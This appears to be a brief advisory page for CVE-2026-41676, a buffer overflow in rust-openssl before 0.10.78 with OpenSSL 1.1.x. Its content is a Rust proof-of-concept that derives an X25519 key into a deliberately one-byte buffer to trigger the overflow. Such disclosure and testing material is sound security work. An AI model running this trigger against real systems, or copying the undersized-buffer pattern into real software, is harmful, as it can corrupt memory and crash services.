CVE-2026-41676 rust-openssl缓冲区溢出漏洞

// PoC for CVE-2026-41676 // Requires rust-openssl < 0.10.78 and OpenSSL 1.1.x use openssl::pkey::{PKey, Id}; use openssl::derive::Deriver; fn main() { // Generate a key pair (e.g., X25519) let key = PKey::generate_x25519().unwrap(); let mut deriver = Deriver::new(&key).unwrap(); // Allocate a buffer smaller than the expected output (32 bytes) let mut buf = [0u8; 1]; // Intentionally small buffer to trigger overflow // This attempts to derive the key into the small buffer. // On vulnerable versions with OpenSSL 1.1.x, this causes a buffer overflow. match deriver.derive(&mut buf) { Ok(len) => println!("Derived {} bytes (unexpected)", len), Err(e) => println!("Error: {}", e), } }